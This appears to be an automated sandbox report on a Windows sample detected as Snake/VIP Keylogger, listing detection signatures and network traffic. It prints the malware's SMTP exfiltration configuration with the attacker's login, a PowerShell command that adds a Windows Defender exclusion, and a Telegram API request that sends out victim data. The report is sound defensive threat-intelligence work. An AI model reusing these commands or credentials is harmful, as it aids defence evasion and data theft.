Edit tour

Windows Analysis Report
VbcXXnmIwPPhh.exe

Overview

General Information

Sample name:	VbcXXnmIwPPhh.exe
Analysis ID:	1519406
MD5:	401098a467fc699acb2d256da47fdace
SHA1:	87484e36df3eb0290178e4ab85b5566fb6f92b16
SHA256:	c803bffcf528efc9a204a34a6a9285128f9dce25d165020fc37198d16ee50c11
Tags:	exeMassLogger
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

VbcXXnmIwPPhh.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" MD5: 401098A467FC699ACB2D256DA47FDACE)

powershell.exe (PID: 2620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

VbcXXnmIwPPhh.exe (PID: 4888 cmdline: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" MD5: 401098A467FC699ACB2D256DA47FDACE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e434:$a1: get_encryptedPassword 0x2e9bc:$a2: get_encryptedUsername 0x2e0a7:$a3: get_timePasswordChanged 0x2e1be:$a4: get_passwordField 0x2e44a:$a5: set_encryptedPassword 0x31173:$a6: get_passwords 0x31507:$a7: get_logins 0x3115f:$a8: GetOutlookPasswords 0x30b18:$a9: StartKeylogger 0x31460:$a10: KeyLoggerEventArgs 0x30bb8:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbf6b4:$a1: get_encryptedPassword 0x102ed4:$a1: get_encryptedPassword 0x25ad14:$a1: get_encryptedPassword 0xbfc3c:$a2: get_encryptedUsername 0x10345c:$a2: get_encryptedUsername 0x25b29c:$a2: get_encryptedUsername 0xbf327:$a3: get_timePasswordChanged 0x102b47:$a3: get_timePasswordChanged 0x25a987:$a3: get_timePasswordChanged 0xbf43e:$a4: get_passwordField 0x102c5e:$a4: get_passwordField 0x25aa9e:$a4: get_passwordField 0xbf6ca:$a5: set_encryptedPassword 0x102eea:$a5: set_encryptedPassword 0x25ad2a:$a5: set_encryptedPassword 0xc23f3:$a6: get_passwords 0x105c13:$a6: get_passwords 0x25da53:$a6: get_passwords 0xc2787:$a7: get_logins 0x105fa7:$a7: get_logins 0x25dde7:$a7: get_logins
00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x78b9d:$a1: get_encryptedPassword 0x7911b:$a2: get_encryptedUsername 0x7881f:$a3: get_timePasswordChanged 0x78936:$a4: get_passwordField 0x78bb3:$a5: set_encryptedPassword 0x7b884:$a6: get_passwords 0x7bc14:$a7: get_logins 0x7b870:$a8: GetOutlookPasswords 0x7b229:$a9: StartKeylogger 0x7bb6d:$a10: KeyLoggerEventArgs 0x7b2c9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21b8e:$a1: get_encryptedPassword 0x2210c:$a2: get_encryptedUsername 0x21810:$a3: get_timePasswordChanged 0x21927:$a4: get_passwordField 0x21ba4:$a5: set_encryptedPassword 0x24875:$a6: get_passwords 0x24c05:$a7: get_logins 0x24861:$a8: GetOutlookPasswords 0x2421a:$a9: StartKeylogger 0x24b5e:$a10: KeyLoggerEventArgs 0x242ba:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.VbcXXnmIwPPhh.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.VbcXXnmIwPPhh.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.VbcXXnmIwPPhh.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.VbcXXnmIwPPhh.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.VbcXXnmIwPPhh.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e634:$a1: get_encryptedPassword 0x2ebbc:$a2: get_encryptedUsername 0x2e2a7:$a3: get_timePasswordChanged 0x2e3be:$a4: get_passwordField 0x2e64a:$a5: set_encryptedPassword 0x31373:$a6: get_passwords 0x31707:$a7: get_logins 0x3135f:$a8: GetOutlookPasswords 0x30d18:$a9: StartKeylogger 0x31660:$a10: KeyLoggerEventArgs 0x30db8:$a11: KeyLoggerEventArgsEventHandler
6.2.VbcXXnmIwPPhh.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bc76:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b319:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b576:$a4: \Orbitum\User Data\Default\Login Data 0x3bf55:$a5: \Kometa\User Data\Default\Login Data
6.2.VbcXXnmIwPPhh.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f9f8:$s1: UnHook 0x2f9ff:$s2: SetHook 0x2fa07:$s3: CallNextHook 0x2fa14:$s4: _hook
0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c834:$a1: get_encryptedPassword 0x2cdbc:$a2: get_encryptedUsername 0x2c4a7:$a3: get_timePasswordChanged 0x2c5be:$a4: get_passwordField 0x2c84a:$a5: set_encryptedPassword 0x2f573:$a6: get_passwords 0x2f907:$a7: get_logins 0x2f55f:$a8: GetOutlookPasswords 0x2ef18:$a9: StartKeylogger 0x2f860:$a10: KeyLoggerEventArgs 0x2efb8:$a11: KeyLoggerEventArgsEventHandler
0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c834:$a1: get_encryptedPassword 0x2cdbc:$a2: get_encryptedUsername 0x2c4a7:$a3: get_timePasswordChanged 0x2c5be:$a4: get_passwordField 0x2c84a:$a5: set_encryptedPassword 0x2f573:$a6: get_passwords 0x2f907:$a7: get_logins 0x2f55f:$a8: GetOutlookPasswords 0x2ef18:$a9: StartKeylogger 0x2f860:$a10: KeyLoggerEventArgs 0x2efb8:$a11: KeyLoggerEventArgsEventHandler
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39e76:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39519:$a3: \Google\Chrome\User Data\Default\Login Data 0x39776:$a4: \Orbitum\User Data\Default\Login Data 0x3a155:$a5: \Kometa\User Data\Default\Login Data
0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39e76:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39519:$a3: \Google\Chrome\User Data\Default\Login Data 0x39776:$a4: \Orbitum\User Data\Default\Login Data 0x3a155:$a5: \Kometa\User Data\Default\Login Data
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2dbf8:$s1: UnHook 0x2dbff:$s2: SetHook 0x2dc07:$s3: CallNextHook 0x2dc14:$s4: _hook
0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2dbf8:$s1: UnHook 0x2dbff:$s2: SetHook 0x2dc07:$s3: CallNextHook 0x2dc14:$s4: _hook
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e634:$a1: get_encryptedPassword 0x2ebbc:$a2: get_encryptedUsername 0x2e2a7:$a3: get_timePasswordChanged 0x2e3be:$a4: get_passwordField 0x2e64a:$a5: set_encryptedPassword 0x31373:$a6: get_passwords 0x31707:$a7: get_logins 0x3135f:$a8: GetOutlookPasswords 0x30d18:$a9: StartKeylogger 0x31660:$a10: KeyLoggerEventArgs 0x30db8:$a11: KeyLoggerEventArgsEventHandler
0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f9f8:$s1: UnHook 0x2f9ff:$s2: SetHook 0x2fa07:$s3: CallNextHook 0x2fa14:$s4: _hook
0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e634:$a1: get_encryptedPassword 0x71e54:$a1: get_encryptedPassword 0x1c9c94:$a1: get_encryptedPassword 0x2ebbc:$a2: get_encryptedUsername 0x723dc:$a2: get_encryptedUsername 0x1ca21c:$a2: get_encryptedUsername 0x2e2a7:$a3: get_timePasswordChanged 0x71ac7:$a3: get_timePasswordChanged 0x1c9907:$a3: get_timePasswordChanged 0x2e3be:$a4: get_passwordField 0x71bde:$a4: get_passwordField 0x1c9a1e:$a4: get_passwordField 0x2e64a:$a5: set_encryptedPassword 0x71e6a:$a5: set_encryptedPassword 0x1c9caa:$a5: set_encryptedPassword 0x31373:$a6: get_passwords 0x74b93:$a6: get_passwords 0x1cc9d3:$a6: get_passwords 0x31707:$a7: get_logins 0x74f27:$a7: get_logins 0x1ccd67:$a7: get_logins
0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f9f8:$s1: UnHook 0x73218:$s1: UnHook 0x1cb058:$s1: UnHook 0x2f9ff:$s2: SetHook 0x7321f:$s2: SetHook 0x1cb05f:$s2: SetHook 0x2fa07:$s3: CallNextHook 0x73227:$s3: CallNextHook 0x1cb067:$s3: CallNextHook 0x2fa14:$s4: _hook 0x73234:$s4: _hook 0x1cb074:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ParentImage: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe, ParentProcessId: 6212, ParentProcessName: VbcXXnmIwPPhh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ProcessId: 2620, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 217.12.218.219, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe, Initiated: true, ProcessId: 4888, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49727

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ParentImage: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe, ParentProcessId: 6212, ParentProcessName: VbcXXnmIwPPhh.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe", ProcessId: 2620, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T13:44:11.001792+0200	2803305	3	Unknown Traffic	192.168.2.7	49706	188.114.96.3	443	TCP
2024-09-26T13:44:13.000341+0200	2803305	3	Unknown Traffic	192.168.2.7	49708	188.114.96.3	443	TCP
2024-09-26T13:44:16.852101+0200	2803305	3	Unknown Traffic	192.168.2.7	49712	188.114.96.3	443	TCP
2024-09-26T13:44:18.300570+0200	2803305	3	Unknown Traffic	192.168.2.7	49715	188.114.96.3	443	TCP
2024-09-26T13:44:23.107514+0200	2803305	3	Unknown Traffic	192.168.2.7	49725	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T13:44:08.575080+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49701	132.226.8.169	80	TCP
2024-09-26T13:44:10.278251+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49701	132.226.8.169	80	TCP
2024-09-26T13:44:12.434480+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49707	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: VbcXXnmIwPPhh.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: VbcXXnmIwPPhh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

Source: VbcXXnmIwPPhh.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
Source:	Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 0168F8E9h	6_2_0168F631
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 0168FD41h	6_2_0168FA88
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DF0D0Dh	6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DF1697h	6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DF31E0h	6_2_06DF2DC8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DF2C19h	6_2_06DF2968
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFE959h	6_2_06DFE6B0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFE501h	6_2_06DFE258
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFE0A9h	6_2_06DFDE00
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFF661h	6_2_06DFF3B8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFF209h	6_2_06DFEF60
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFEDB1h	6_2_06DFEB08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFD3A1h	6_2_06DFD0F8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFCF49h	6_2_06DFCCA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_06DF0040
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFFAB9h	6_2_06DFF810
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DF31E0h	6_2_06DF2DBF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFDC51h	6_2_06DFD9A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DFD7F9h	6_2_06DFD550
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 4x nop then jmp 06DF31E0h	6_2_06DF310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:49727 -> 217.12.218.219:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 217.12.218.219 217.12.218.219

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
